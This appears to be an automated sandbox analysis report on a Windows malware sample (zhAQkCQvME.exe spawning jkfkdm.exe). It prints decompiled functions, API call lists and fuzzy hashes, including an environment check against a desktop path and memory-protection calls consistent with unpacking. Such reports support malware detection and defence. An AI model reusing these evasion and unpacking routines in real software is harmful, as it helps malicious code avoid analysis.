0x00410e37
0x00410e3b
0x00410e3d
0x00410e54
0x00410e58
0x00410e5a
0x00410e5e
0x00410e5e
0x00410e69
0x00410e70
0x00410e76
0x00000000
0x00000000
0x00000000
0x00000000
0x00410df2
0x00410df2
0x00410df2
0x00410df4
0x00000000
0x00000000
0x00410df6
0x00410df8
0x00000000
0x00000000
0x00000000
0x00000000
0x00410dc9
0x00410dc9
0x00410dc9
0x00410dcb
0x00000000
0x00000000
0x00410dcd
0x00410dcf
0x00000000

APIs

Part of subcall function 00403EE0: RtlAllocateHeap.NTDLL(015D0000,00000008,00415340,?,?,00403F90,00407DD5,?,?,00407DD6,00415340,00000839), ref: 00403EF1

LoadLibraryA.KERNEL32(015D0D5A), ref: 00410DBA
GetProcAddress.KERNEL32(?,015D0807), ref: 00410DE3
FreeLibrary.KERNEL32(?), ref: 00410E4A
FreeLibrary.KERNEL32(?), ref: 00410E5E

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Library$Free$AddressAllocateHeapLoadProc
String ID:
API String ID: 1261646086-0
Opcode ID: 861104b34da3f1f378bafe4e78a0eb3627ec6fce25f8dc34f2e382497dc03298
Instruction ID: d137d7924767d195dc97c7053e229f76469c9ae78eda021b781760fc751cf8c6
Opcode Fuzzy Hash: 861104b34da3f1f378bafe4e78a0eb3627ec6fce25f8dc34f2e382497dc03298
Instruction Fuzzy Hash: 3F31B4B0900304EBCB10DFE5E8497EE7B74AB48304F20856AE115A72D0D7B85AC6CB9A

Uniqueness

Uniqueness Score: 2.20%

Function 004071D0, Relevance: 6.0, APIs: 4, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004071D0(void* __ecx, CHAR* _a4) {
				void* _v8;

				_v8 = OpenEventA(2, 0, _a4);
				if(_v8 != 0) {
					if(SetEvent(_v8) != 0) {
						CloseHandle(_v8);
						return 1;
					}
					while(0 != 0) {
					}
					CloseHandle(_v8);
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x004071e2
0x004071e9
0x00407201
0x0040721b
0x00000000
0x00407221
0x00407203
0x00407207
0x0040720d
0x00000000
0x00407213
0x004071eb
0x004071ef
0x00000000

APIs

OpenEventA.KERNEL32(00000002,00000000,0040184E,?,?,0040184E,?), ref: 004071DC
SetEvent.KERNEL32(00000000,?,?,0040184E), ref: 004071F9
CloseHandle.KERNEL32(00000000), ref: 0040720D
CloseHandle.KERNEL32(00000000), ref: 0040721B

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CloseEventHandle$Open
String ID:
API String ID: 2183081999-0
Opcode ID: 5a2f3b2909cc7e489e936494082af7dd8eca61afdbf128ba8a1b98334e46ed59
Instruction ID: b60f9189be6b8914dc3565846e331f578781f82c31b0c27eae391f0ccac7fa0d
Opcode Fuzzy Hash: 5a2f3b2909cc7e489e936494082af7dd8eca61afdbf128ba8a1b98334e46ed59
Instruction Fuzzy Hash: F5F01275F0C208FBC710CBE0DD45B6B7664AB48741F6049BAF506E62C1E638EA41A65A

Uniqueness

Uniqueness Score: 3.75%

Function 00402D30, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 30
stringUNIQUE

Download Yara Rule

C-Code - Quality: 37%

			E00402D30(void* __ecx, void* __eflags, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				short _v44;

				_v12 = 0;
				E00409670(__ecx, __eflags, __fp0, "zhAQkCQvME",  &_v44, 0x10);
				_v8 = E00404730(__eflags, "C:\Users\Luke\Desktop", 0x5c);
				_t4 =  &_v8; // 0x4034ec
				if(lstrcmpiW( &_v44,  *_t4) == 0) {
					_v12 = 1;
				}
				while(0 != 0) {
				}
				return _v12;
			}

0x00402d36
0x00402d48
0x00402d5f
0x00402d62
0x00402d72
0x00402d74
0x00402d74
0x00402d7b
0x00402d7f
0x00402d87

APIs

Part of subcall function 00409670: lstrlenA.KERNEL32(?,00000000,?), ref: 004096AA
Part of subcall function 00409670: lstrlenA.KERNEL32(?), ref: 0040970B

Part of subcall function 00404730: _wcschr.LIBCMTD ref: 0040474C

lstrcmpiW.KERNEL32(?,4@), ref: 00402D6A

Strings

zhAQkCQvME, xrefs: 00402D43
C:\Users\user\Desktop, xrefs: 00402D52
4@, xrefs: 00402D62, 00402D65

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: lstrlen$_wcschrlstrcmpi
String ID: C:\Users\user\Desktop$zhAQkCQvME$4@
API String ID: 3121793766-3915814883
Opcode ID: 52ad0d404da278daaa17c6beb4960306798b2657e0d86496c8ea07c18706d623
Instruction ID: c664ae9c9a1316be02b7d3ba212674ca75785532961efb492e7c30562f729fa5
Opcode Fuzzy Hash: 52ad0d404da278daaa17c6beb4960306798b2657e0d86496c8ea07c18706d623
Instruction Fuzzy Hash: 94F0A775E40208ABD700EBE09D4AFDE7B789B04705F104076E909762C1F7B89A498765

Uniqueness

Uniqueness Score: 100.00%

Function 00402A60, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51
libraryUNIQUE

Download Yara Rule

C-Code - Quality: 33%

			E00402A60() {
				void* _t8;
				void* _t10;
				void* _t13;

				LoadLibraryA("shlwapi.dll");
				E00403EC0();
				while(0 != 0) {
				}
				if(E00407D90(0, 0) >= 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					E00409FB0();
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					E00408AF0(1, 0);
					_push(0);
					_t8 = E00407A30(_t13, 0x41e030);
					__eflags = _t8;
					if(_t8 >= 0) {
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						E004025E0(_t13);
						_t10 = E00408C10(1);
						ExitProcess(0);
					} else {
						goto L13;
					}
					while(1) {
						L13:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					return 3;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x00402a68
0x00402a6e
0x00402a73
0x00402a77
0x00402a85
0x00402a91
0x00402a91
0x00402a93
0x00000000
0x00000000
0x00402a95
0x00402a97
0x00402a9c
0x00402a9c
0x00402a9e
0x00000000
0x00000000
0x00402aa0
0x00402aa6
0x00402aae
0x00402ab5
0x00402abd
0x00402abf
0x00402ace
0x00402ace
0x00402ad0
0x00000000
0x00000000
0x00402ad2
0x00402ad4
0x00402adb
0x00402ae5
0x00000000
0x00000000
0x00000000
0x00402ac1
0x00402ac1
0x00402ac1
0x00402ac3
0x00000000
0x00000000
0x00402ac5
0x00000000
0x00402ac7
0x00402a87
0x00402a8b
0x00000000

APIs

LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00402A68

Part of subcall function 00403EC0: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,00403298), ref: 00403ECC

ExitProcess.KERNEL32 ref: 00402AE5

Strings

shlwapi.dll, xrefs: 00402A63

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CreateExitHeapLibraryLoadProcess
String ID: shlwapi.dll
API String ID: 1270678790-3792422438
Opcode ID: 2ccd72a7ac42eaeb60dbecb597c72526941c31e0dde6618529d0a3df275d487d
Instruction ID: d31800521479d241c9f5d32e1e9aa890d0bc1379fdebea4836c176a273222d25
Opcode Fuzzy Hash: 2ccd72a7ac42eaeb60dbecb597c72526941c31e0dde6618529d0a3df275d487d
Instruction Fuzzy Hash: FF018124769602A2EAB421B36F0F77B24444B50709F28403BB90AB02C3FDFD99025C7F

Uniqueness

Uniqueness Score: 100.00%

Function 00403E00, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
timeUNIQUE

Download Yara Rule

C-Code - Quality: 91%

			E00403E00(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _t26;
				intOrPtr* _t28;

				_t1 =  &_v12; // 0x4035ed
				GetSystemTimeAsFileTime(_t1);
				_v16 = _v8;
				_t4 =  &_v12; // 0x4035ed
				_t26 =  *_t4;
				_v20 = _t26;
				asm("sbb ecx, 0x19db1de");
				_v28 = E00403A00(_v20 - 0xd53e8000, _v16, 0x989680, 0);
				_v24 = _t26;
				if(_a4 != 0) {
					_t28 = _a4;
					 *_t28 = _v28;
					 *((intOrPtr*)(_t28 + 4)) = _v24;
				}
				return _v28;
			}

0x00403e06
0x00403e0a
0x00403e13
0x00403e16
0x00403e16
0x00403e19
0x00403e27
0x00403e3b
0x00403e3e
0x00403e45
0x00403e47
0x00403e4d
0x00403e52
0x00403e52
0x00403e5e

APIs

GetSystemTimeAsFileTime.KERNEL32(5@,?,?,?,?,004035ED,00000000), ref: 00403E0A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00403E36

Strings

5@, xrefs: 00403E06, 00403E16, 00403E09

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: 5@
API String ID: 1518329722-819730362
Opcode ID: 6e9edc84334137e13965fd84b5c43c5f45e55107af988eb02851f65e019b0826
Instruction ID: 3333c11c82d9986f0299ad6785e00b5000d47f2bebf67448f80501a079fb7f4a
Opcode Fuzzy Hash: 6e9edc84334137e13965fd84b5c43c5f45e55107af988eb02851f65e019b0826
Instruction Fuzzy Hash: A101C9B4E0020DAFCB04DFA8C945AAEFBB5FB48300F108659E909B7340D734AA40CBD4

Uniqueness

Uniqueness Score: 100.00%

Analysis Process: zhAQkCQvME.exe PID: 2380 Parent PID: 2276 zhAQkCQvME.exeCOMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01322A35, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 01322ABA

Memory Dump Source

Source File: 00000001.00000002.452315019.01320000.00000040.00000001.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_zhAQkCQvME.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a3a5aa490ac2fa1ade146a5c05f17c48c80c8e7179467403050ae5a79c0d2575
Instruction ID: 95e292365bc97b41af25cde97f45802267d1c2b744d5af751c130bddd39a9a25
Opcode Fuzzy Hash: a3a5aa490ac2fa1ade146a5c05f17c48c80c8e7179467403050ae5a79c0d2575
Instruction Fuzzy Hash: 5C214AB1E002198FDB14EFA9D8505AEBBF5FF88304F14816AE805A7740DB34A941CF95

Uniqueness

Uniqueness Score: 0.01%

Function 01321827, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 275
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 013218F9
VirtualProtect.KERNELBASE ref: 013219B9
VirtualProtect.KERNELBASE ref: 01321CA0

Strings

Cy, xrefs: 01321855
p, xrefs: 01321B05

Memory Dump Source

Source File: 00000001.00000002.452315019.01320000.00000040.00000001.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_zhAQkCQvME.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy$p
API String ID: 544645111-1378413450
Opcode ID: 026774317cf1cff5e57f06ad87bf8f532eaa41d7c95e9cb25078fc602b2ce3c7
Instruction ID: 8981686ea1c12f7267006282cc752bf04844c35240128e9b2d3cd41185659d1e
Opcode Fuzzy Hash: 026774317cf1cff5e57f06ad87bf8f532eaa41d7c95e9cb25078fc602b2ce3c7
Instruction Fuzzy Hash: F4D1E175A183818FD324CF29C180B9AFBE1BFD8314F15895EE99D97311E731A845CB82

Uniqueness

Uniqueness Score: 100.00%

Function 01321826, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 225
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 013218F9
VirtualProtect.KERNELBASE ref: 013219B9
VirtualProtect.KERNELBASE ref: 01321CA0

Strings

Cy, xrefs: 01321855

Memory Dump Source

Source File: 00000001.00000002.452315019.01320000.00000040.00000001.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_zhAQkCQvME.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy
API String ID: 544645111-3008677793
Opcode ID: 3ad267a30987450522a66ff85a1b1147069fa60aa76bfa1a2d7230190afc54b0
Instruction ID: 3ca2b4c3f63744b0aa98c33fdcd9ba60f0e04d99068875d149f902b34262e25a
Opcode Fuzzy Hash: 3ad267a30987450522a66ff85a1b1147069fa60aa76bfa1a2d7230190afc54b0
Instruction Fuzzy Hash: FBB1D2B5A183818FD328CF29C180A9AFBF1BFD8714F15891EE9D997351D730A845CB86

Uniqueness

Uniqueness Score: 100.00%

Function 01322D3A, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 148
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 01322E41

Strings

fg(, xrefs: 01322DD0

Memory Dump Source

Source File: 00000001.00000002.452315019.01320000.00000040.00000001.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_zhAQkCQvME.jbxd

Similarity

API ID: AllocVirtual
String ID: fg(
API String ID: 4275171209-1623029493
Opcode ID: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction ID: b0a121a0dd95be193030713c68a9aae6a5f96bc4868ca77a55e2769c95ebbbcb
Opcode Fuzzy Hash: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction Fuzzy Hash: 4F61BCB5A193818FD348DF29C58065AFBF1BFC8714F11891EE8889B351E3B5E845CB86

Uniqueness

Uniqueness Score: 100.00%

Function 01322593, Relevance: 1.6, APIs: 1, Instructions: 118
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 013226B9

Memory Dump Source

Source File: 00000001.00000002.452315019.01320000.00000040.00000001.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_zhAQkCQvME.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction ID: 5b140aaa2b2d7355aff0037a7b47d86a63ae03d29d54c952af33d67a2b56738f
Opcode Fuzzy Hash: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction Fuzzy Hash: A251CB75A083808FC364CF29C49075BFBE2BFC8718F14892EE98997311D771A841CB42

Uniqueness

Uniqueness Score: 0.02%

Function 0132273A, Relevance: 1.6, APIs: 1, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 013226B9
GetProcAddress.KERNELBASE ref: 013227AE

Memory Dump Source

Source File: 00000001.00000002.452315019.01320000.00000040.00000001.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_zhAQkCQvME.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction ID: d0f8907759e686b3827bdf04da1a1f023a465245857fc491138e692466527863
Opcode Fuzzy Hash: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction Fuzzy Hash: EB31EE76A083518FC324DF29C49066BFBE2BFC8B14F15891EE99997350D7B4A844CB82

Uniqueness

Uniqueness Score: 0.01%

Function 013225B6, Relevance: 1.6, APIs: 1, Instructions: 67
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 013226B9

Memory Dump Source

Source File: 00000001.00000002.452315019.01320000.00000040.00000001.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_zhAQkCQvME.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction ID: 084a4db7201c5aa924f6dd3e2d25a5dcc4f4bd5beff882cf0419aa914e9fb058
Opcode Fuzzy Hash: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction Fuzzy Hash: 6621DD75A093508BC368DF28D59075BBBE1BBC8718F60492EF99A87710D770E880CB43

Uniqueness

Uniqueness Score: 0.02%

Non-executed Functions

Analysis Process: jkfkdm.exe PID: 2340 Parent PID: 2276 jkfkdm.exeCOMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01292A35, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 01292ABA

Memory Dump Source

Source File: 00000002.00000002.487409359.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1290000_jkfkdm.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: eb797995a8fbca99ff96e89b6986956d03bf6317f5166688418bc8b6883c2b58
Instruction ID: a5b352a16733727477ded73eeddb29b0a99042ed55ead5671fb99942b561d1c3
Opcode Fuzzy Hash: eb797995a8fbca99ff96e89b6986956d03bf6317f5166688418bc8b6883c2b58
Instruction Fuzzy Hash: 5E2127B2E20209DFCF14DFADD9515AEBBF1FF88310B14416AE905A7340D738A941CB95

Uniqueness

Uniqueness Score: 0.01%

Function 01291827, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 275
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 012918F9
VirtualProtect.KERNELBASE ref: 012919B9
VirtualProtect.KERNELBASE ref: 01291CA0

Strings

Cy, xrefs: 01291855
p, xrefs: 01291B05

Memory Dump Source

Source File: 00000002.00000002.487409359.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1290000_jkfkdm.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy$p
API String ID: 544645111-1378413450
Opcode ID: 6cb331f660c560f317ed320c61f6af34281bfd0a0f29045892c15fb1a26c5d69
Instruction ID: a5ec594e6aa15f133aa6b8b581af98a63b0eb886bf4ff18148521ecb79e21d90
Opcode Fuzzy Hash: 6cb331f660c560f317ed320c61f6af34281bfd0a0f29045892c15fb1a26c5d69
Instruction Fuzzy Hash: F9D1E075A183818FD324CF29C080B9AFBE1BFD8314F15895EE99D97361E771A841CB92

Uniqueness

Uniqueness Score: 100.00%

Function 01291826, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 225
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 012918F9
VirtualProtect.KERNELBASE ref: 012919B9
VirtualProtect.KERNELBASE ref: 01291CA0

Strings

Cy, xrefs: 01291855

Memory Dump Source

Source File: 00000002.00000002.487409359.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1290000_jkfkdm.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy
API String ID: 544645111-3008677793
Opcode ID: b47a4c327fff566dfc447a2b7b6723e2f3a3420f971f2f78a3d70d4393666e89
Instruction ID: ba11a305e7af5377563fbf814f87d7122d92e506c21e5f8e06df12856f2a4620
Opcode Fuzzy Hash: b47a4c327fff566dfc447a2b7b6723e2f3a3420f971f2f78a3d70d4393666e89
Instruction Fuzzy Hash: A3B1D375A183818FD328CF29C08069AFBE1BFD8714F15895EE9DD97361E730A841CB86

Uniqueness

Uniqueness Score: 100.00%

Function 01292D3A, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 148
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 01292E41

Strings

fg(, xrefs: 01292DD0

Memory Dump Source

Source File: 00000002.00000002.487409359.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1290000_jkfkdm.jbxd

Similarity

API ID: AllocVirtual
String ID: fg(
API String ID: 4275171209-1623029493
Opcode ID: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction ID: e86682650cbc9b7ee28a7a15881dadc08a3170ea135b45d89c7e99ac93b4692a
Opcode Fuzzy Hash: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction Fuzzy Hash: 9F61BDB59193418FD748DF29C18065AFBF1BFC8714F11895EE8888B351E3B5E845CB86

Uniqueness

Uniqueness Score: 100.00%

Function 01292593, Relevance: 1.6, APIs: 1, Instructions: 118
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012926B9

Memory Dump Source

Source File: 00000002.00000002.487409359.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1290000_jkfkdm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction ID: 9cef995cb2a633db6b592da89a8252ecd2a8d6535d30ce7dcc76e80b2453404f
Opcode Fuzzy Hash: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction Fuzzy Hash: 5D51BC79A19380DFC768CF28C19075AFBE2BFC9714F14892EE99997310D771A841CB82

Uniqueness

Uniqueness Score: 0.02%

Function 0129273A, Relevance: 1.6, APIs: 1, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012926B9
GetProcAddress.KERNELBASE ref: 012927AE

Memory Dump Source

Source File: 00000002.00000002.487409359.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1290000_jkfkdm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction ID: d981deb4fbc51fa019fe28d20f280247c4f4bdaa9aaea2248e565c08e0b405c7
Opcode Fuzzy Hash: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction Fuzzy Hash: 3931EE76A18341DFC728CF29D19065AF7E2BFC8710F15891EE99997340D770A804CB82

Uniqueness

Uniqueness Score: 0.01%

Function 012925B6, Relevance: 1.6, APIs: 1, Instructions: 67
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012926B9

Memory Dump Source

Source File: 00000002.00000002.487409359.01290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1290000_jkfkdm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction ID: 5da7e2f4d9dfc4da574c324df8f4c6ca1f929486e8ee09f182ba06ef442374b1
Opcode Fuzzy Hash: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction Fuzzy Hash: E821AC79A29341DFCB68CF28D19065ABBE1BB88714F50492EF69A97750D670A840CB82

Uniqueness

Uniqueness Score: 0.02%

Non-executed Functions

Analysis Process: zhAQkCQvME.exe PID: 2444 Parent PID: 1488 zhAQkCQvME.exeCOMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 006D2A35, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 006D2ABA

Memory Dump Source

Source File: 00000005.00000002.485134690.006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d0000_zhAQkCQvME.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 48fd353eb89bfcfef494e2e1e89701115ab01f0029bfb527d37c7de1f086232e
Instruction ID: efc6f7677789cd3cf3bf993b3bfa279742d5bd8b08db95de903f10b8d0b97135
Opcode Fuzzy Hash: 48fd353eb89bfcfef494e2e1e89701115ab01f0029bfb527d37c7de1f086232e
Instruction Fuzzy Hash: D7212AB1E0120A9FCB14DFA9D8615EEBBF2FF88700F15816AE915AB340D734AD41CB95

Uniqueness

Uniqueness Score: 0.01%

Function 006D1827, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 275
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 006D18F9
VirtualProtect.KERNEL32 ref: 006D19B9
VirtualProtect.KERNEL32 ref: 006D1CA0

Strings

p, xrefs: 006D1B05
Cy, xrefs: 006D1855

Memory Dump Source

Source File: 00000005.00000002.485134690.006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d0000_zhAQkCQvME.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy$p
API String ID: 544645111-1378413450
Opcode ID: 6e3bb680297a58adfd52aee1824f617eca9e35285bbf7f833e24e804c2040bf8
Instruction ID: 486a8160591021109a13304865dd28974e8c5faaf0c1c3a15720ff5b5aa12c4d
Opcode Fuzzy Hash: 6e3bb680297a58adfd52aee1824f617eca9e35285bbf7f833e24e804c2040bf8
Instruction Fuzzy Hash: D4D1E175A183818FD324CF29C080B9AFBE1BFD8314F15895EE99D97321E771A841CB86

Uniqueness

Uniqueness Score: 100.00%

Function 006D1826, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 225
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 006D18F9
VirtualProtect.KERNEL32 ref: 006D19B9
VirtualProtect.KERNEL32 ref: 006D1CA0

Strings

Cy, xrefs: 006D1855

Memory Dump Source

Source File: 00000005.00000002.485134690.006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d0000_zhAQkCQvME.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy
API String ID: 544645111-3008677793
Opcode ID: 92c3bda60bc7bf52581ae1856752446c32531af44fd0a80c54adb48b73ce42cc
